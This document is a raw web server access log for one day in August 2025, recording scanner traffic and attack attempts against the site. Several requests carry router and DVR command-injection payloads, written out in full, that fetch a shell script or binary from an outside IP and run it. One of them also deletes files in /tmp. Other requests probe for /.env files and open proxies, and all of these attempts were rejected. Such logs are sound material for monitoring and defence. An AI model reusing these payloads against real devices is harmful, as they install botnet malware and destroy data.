141.98.11.57 - - [17/Aug/2025:00:07:06 +0200] "-" 400 1930 176.65.148.144 - - [17/Aug/2025:01:19:36 +0200] "GET / HTTP/1.1" 200 1895 141.98.10.21 - - [17/Aug/2025:01:52:08 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;rm+-rf+*;wget+http://66.63.187.141/netg;chmod+777+netg;sh+netg+netgear;&curpath=/¤tsetting.htm=1; HTTP/1.1" 404 727 20.80.88.7 - - [17/Aug/2025:02:13:07 +0200] "-" 400 1930 66.228.53.162 - - [17/Aug/2025:02:18:24 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.223 - - [17/Aug/2025:02:21:11 +0200] "GET / HTTP/1.1" 200 1895 45.95.147.173 - - [17/Aug/2025:02:47:00 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 176.65.148.144 - - [17/Aug/2025:02:55:39 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.57 - - [17/Aug/2025:03:40:38 +0200] "-" 400 1930 195.96.129.82 - - [17/Aug/2025:03:51:59 +0200] "GET / HTTP/1.1" 200 1895 195.96.129.82 - - [17/Aug/2025:03:52:19 +0200] "GET login.cgi HTTP/1.1" 400 804 195.96.129.82 - - [17/Aug/2025:03:52:19 +0200] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget%20http%3A%2F%2F207.244.199.152%2Ftbk.sh%20-O-%20%7C%20sh HTTP/1.1" 404 728 195.96.129.82 - - [17/Aug/2025:03:52:19 +0200] "GET / HTTP/1.0" 200 1895 195.96.129.82 - - [17/Aug/2025:03:52:19 +0200] "GET login.cgi HTTP/1.1" 400 804 195.96.129.82 - - [17/Aug/2025:03:52:19 +0200] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget%20http%3A%2F%2F207.244.199.152%2Ftbk.sh%20-O-%20%7C%20sh HTTP/1.1" 404 728 195.96.129.82 - - [17/Aug/2025:03:52:19 +0200] "GET / HTTP/1.0" 200 1895 93.123.109.34 - - [17/Aug/2025:04:08:17 +0200] "GET /.env HTTP/1.1" 404 722 89.248.168.227 - - [17/Aug/2025:04:49:50 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.122 - - [17/Aug/2025:04:51:05 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.125 - - [17/Aug/2025:04:51:40 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.122 - - [17/Aug/2025:04:51:58 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.125 - - [17/Aug/2025:04:52:07 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 64.62.156.122 - - [17/Aug/2025:04:52:24 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 209.38.136.86 - - [17/Aug/2025:06:49:03 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:03 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:03 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:04 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:04 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:04 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:05 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:05 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:05 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:06 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:06 +0200] "-" 400 1930 209.38.136.86 - - [17/Aug/2025:06:49:06 +0200] "-" 400 1930 45.227.254.155 - - [17/Aug/2025:07:10:55 +0200] "-" 400 1930 141.98.11.57 - - [17/Aug/2025:07:16:58 +0200] "-" 400 1930 137.184.207.128 - - [17/Aug/2025:08:04:43 +0200] "-" 400 1930 137.184.207.128 - - [17/Aug/2025:08:04:43 +0200] "-" 400 1930 137.184.207.128 - - [17/Aug/2025:08:04:43 +0200] "GET / HTTP/1.1" 200 1895 137.184.207.128 - - [17/Aug/2025:08:04:43 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 137.184.207.128 - - [17/Aug/2025:08:04:43 +0200] "GET /get.php HTTP/1.1" 404 725 198.235.24.214 - - [17/Aug/2025:08:19:45 +0200] "-" 400 1930 198.235.24.214 - - [17/Aug/2025:08:19:45 +0200] "-" 400 1930 184.105.139.69 - - [17/Aug/2025:08:22:24 +0200] "-" 400 1930 176.65.148.144 - - [17/Aug/2025:09:12:36 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.32 - - [17/Aug/2025:09:30:11 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.32 - - [17/Aug/2025:09:30:16 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.32 - - [17/Aug/2025:09:30:17 +0200] "GET /favicon.ico HTTP/1.1" 404 729 206.168.34.32 - - [17/Aug/2025:09:30:32 +0200] "GET /favicon.ico HTTP/1.1" 404 729 206.168.34.32 - - [17/Aug/2025:09:30:36 +0200] "-" 400 1930 206.168.34.32 - - [17/Aug/2025:09:30:38 +0200] "GET /security.txt HTTP/1.1" 404 730 206.123.145.21 - - [17/Aug/2025:10:27:08 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:27:16 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:27:28 +0200] "CONNECT 206.123.145.21:80 HTTP/1.0" 400 804 206.123.145.21 - - [17/Aug/2025:10:27:34 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:27:45 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:27:51 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:28:05 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:28:12 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:28:28 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:28:42 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:28:57 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:29:08 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:29:15 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:29:28 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:29:39 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:29:53 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:30:01 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:30:20 +0200] "-" 400 1930 206.123.145.21 - - [17/Aug/2025:10:30:25 +0200] "-" 400 1930 199.204.96.26 - - [17/Aug/2025:11:08:31 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 195.96.129.82 - - [17/Aug/2025:11:24:47 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.57 - - [17/Aug/2025:11:43:30 +0200] "-" 400 1930 195.96.129.82 - - [17/Aug/2025:11:45:21 +0200] "GET / HTTP/1.1" 200 1895 54.87.42.215 - - [17/Aug/2025:12:50:45 +0200] "GET / HTTP/1.1" 200 1895 3.131.215.38 - - [17/Aug/2025:12:58:05 +0200] "GET / HTTP/1.1" 200 1895 3.131.215.38 - - [17/Aug/2025:12:59:44 +0200] "GET / HTTP/1.1" 200 1895 3.131.215.38 - - [17/Aug/2025:13:01:11 +0200] "-" 400 1930 3.131.215.38 - - [17/Aug/2025:13:02:30 +0200] "-" 400 1930 3.131.215.38 - - [17/Aug/2025:13:04:11 +0200] "-" 400 1930 112.46.214.60 - - [17/Aug/2025:13:27:50 +0200] "GET / HTTP/1.1" 400 771 87.121.84.25 - - [17/Aug/2025:14:09:15 +0200] "GET / HTTP/1.0" 200 1895 199.204.96.10 - - [17/Aug/2025:14:35:17 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 141.98.11.57 - - [17/Aug/2025:15:12:52 +0200] "-" 400 1930 199.204.96.10 - - [17/Aug/2025:15:23:02 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 138.199.18.147 - - [17/Aug/2025:16:02:50 +0200] "CONNECT www.uni-konstanz.de:443 HTTP/1.1" 400 804 81.15.138.75 - - [17/Aug/2025:17:28:13 +0200] "GET / HTTP/1.1" 200 1895 44.220.188.38 - - [17/Aug/2025:17:49:08 +0200] "GET / HTTP/1.1" 200 1895 178.62.248.112 - - [17/Aug/2025:18:37:10 +0200] "-" 400 1930 178.62.248.112 - - [17/Aug/2025:18:37:10 +0200] "-" 400 1930 178.62.248.112 - - [17/Aug/2025:18:37:10 +0200] "GET / HTTP/1.1" 200 1895 178.62.248.112 - - [17/Aug/2025:18:37:10 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 178.62.248.112 - - [17/Aug/2025:18:37:10 +0200] "GET /get.php HTTP/1.1" 404 725 80.75.212.17 - - [17/Aug/2025:18:40:33 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 400 804 141.98.11.57 - - [17/Aug/2025:19:12:11 +0200] "-" 400 1930 220.157.184.240 - - [17/Aug/2025:21:32:19 +0200] "GET / HTTP/1.0" 200 1895 45.79.181.251 - - [17/Aug/2025:21:44:48 +0200] "-" 400 1930 45.79.181.251 - - [17/Aug/2025:21:44:49 +0200] "-" 400 1930 91.148.238.252 - - [17/Aug/2025:21:46:12 +0200] "GET / HTTP/1.1" 200 1895 147.185.132.138 - - [17/Aug/2025:22:24:16 +0200] "-" 400 1930 147.185.132.138 - - [17/Aug/2025:22:24:16 +0200] "-" 400 1930 45.79.115.134 - - [17/Aug/2025:22:36:42 +0200] "GET / HTTP/1.1" 200 1895 196.251.89.45 - - [17/Aug/2025:23:04:13 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 196.251.89.45 - - [17/Aug/2025:23:04:13 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 198.235.24.96 - - [17/Aug/2025:23:24:44 +0200] "GET / HTTP/1.1" 200 1895 20.65.192.98 - - [17/Aug/2025:23:54:50 +0200] "GET / HTTP/1.1" 200 1895